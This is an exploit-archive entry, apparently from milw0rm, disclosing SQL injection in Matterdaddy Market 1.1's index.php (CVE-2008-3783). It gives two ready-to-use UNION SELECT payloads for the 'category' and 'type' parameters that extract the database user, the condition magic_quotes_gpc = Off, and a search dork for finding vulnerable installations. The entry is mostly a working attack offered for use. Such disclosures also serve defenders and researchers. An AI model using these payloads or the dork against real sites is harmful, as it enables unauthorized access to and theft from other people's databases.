Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections



EKU-ID: 14196 CVE: OSVDB-47760;CVE-2008-3783 OSVDB-ID:
Author: ~!Dok_tOR!~ Published: 2008-08-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*

Dork:

made by matterdaddy

# milw0rm.com [2008-08-25]